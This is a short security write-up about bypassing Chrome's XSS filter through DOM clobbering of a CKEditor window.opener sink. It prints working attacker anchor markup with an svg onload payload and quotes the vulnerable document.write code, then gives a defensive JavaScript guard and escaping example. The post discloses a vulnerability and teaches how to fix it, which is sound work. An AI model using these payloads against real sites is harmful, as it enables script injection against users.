Chrome XSS filter bypass for a DOM clobbering attack

I found an interesting Chrome XSS filter bypass in @0x6D6172696F's @nullcon training for this DOM clobbering attack

window.opener can sometimes be abused to launch XSS attacks. Here is an interesting XSS filter bypass which I found during Mario Heiderich’s training at NullCon, Goa 2015.

In the DOM clobbering attack below (the CKEditor DOM XSS issue), a page hosting the following malicious link will trigger DOM XSS on the target application once it is clicked:

<a href="vuln.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">XSS ME!</a>

The attack vector above only works on IE and is blocked by Chrome’s XSS filter. One way to bypass the filter is to craft the attacker page with the following code instead:

<a href="#<svg onload=alert(1)>" id="_cke_htmlToLoad"></a>
<a href="vuln.html" target="_blank" id="_c">XSS ME!</a>

Vulnerable code:

var doc = document;
doc.write( window.opener._cke_htmlToLoad );   // << Vulnerable code: the opener-controlled value is written as HTML without any check

delete window.opener._cke_htmlToLoad;

[Changelog for the XSS fix]
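The vulnerable sink above trusts whatever window.opener._cke_htmlToLoad resolves to. With DOM clobbering that property is not a string the opener set on purpose but the <a id="_cke_htmlToLoad"> element, and an anchor element stringifies to its href, so the fragment in the href is what document.write() receives. The following is an added defensive example, not CKEditor's code and not the fix referenced in the changelog: it shows the coercion that makes the clobbered element dangerous and a hardened reader that refuses anything that is not a genuine string, then HTML-escapes before it reaches a parsing sink. The opener objects and the attacker URL are constructed stand-ins so the code runs outside a browser; readOpenerPayload, safeHtmlToLoad and escapeHtml are names chosen here.

```javascript
// Added defensive example (not CKEditor's own code). Models the two shapes
// window.opener._cke_htmlToLoad can take and a guard that tells them apart.

// HTML-escape a value so it is inert when handed to an HTML-parsing sink.
function escapeHtml(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, function (c) { return map[c]; });
}

// Return the opener-supplied value only if it is a real string. A DOM-clobbered
// property is an element object, so it fails the typeof check and is refused.
function readOpenerPayload(opener) {
  if (!opener) return null;
  var value;
  try {
    value = opener._cke_htmlToLoad;
  } catch (e) {
    // In a browser a cross-origin opener throws on property access.
    return null;
  }
  return typeof value === 'string' ? value : null;
}

// Hardened replacement for `doc.write(window.opener._cke_htmlToLoad)`:
// returns the escaped string that would be written, or null when refused.
function safeHtmlToLoad(opener) {
  var payload = readOpenerPayload(opener);
  if (payload === null) return null;
  return escapeHtml(payload);
}

// What the original sink effectively receives: document.write() coerces its
// argument to a string, and an anchor element coerces to its href.
function originalSinkInput(opener) {
  return String(opener._cke_htmlToLoad);
}

// --- Constructed stand-ins (no DOM is available in Node) ---

// Clobbered opener: the property resolves to an element-like object whose
// toString() mimics HTMLAnchorElement, i.e. it yields the full href.
var clobberedAnchor = {
  id: '_cke_htmlToLoad',
  href: 'https://example.invalid/attacker.html#<svg onload=alert(1)>',
  toString: function () { return this.href; }
};
var clobberedOpener = { _cke_htmlToLoad: clobberedAnchor };

// Legitimate opener that assigned a plain string.
var honestOpener = { _cke_htmlToLoad: '<p>hello</p>' };

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable sink receives :', originalSinkInput(clobberedOpener));
  console.log('hardened, clobbered      :', safeHtmlToLoad(clobberedOpener));
  console.log('hardened, honest string  :', safeHtmlToLoad(honestOpener));
}
```

The typeof guard is what defeats the clobbering: the attacker can only plant an element under that name, never a primitive string. The escaping step is a separate choice; where the feature genuinely needs to load raw HTML supplied by the opener, a string passing the guard is still attacker-influenced and the sink needs its own sanitisation or a trust decision about the opener.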

Found on: 05 Feb 2015 

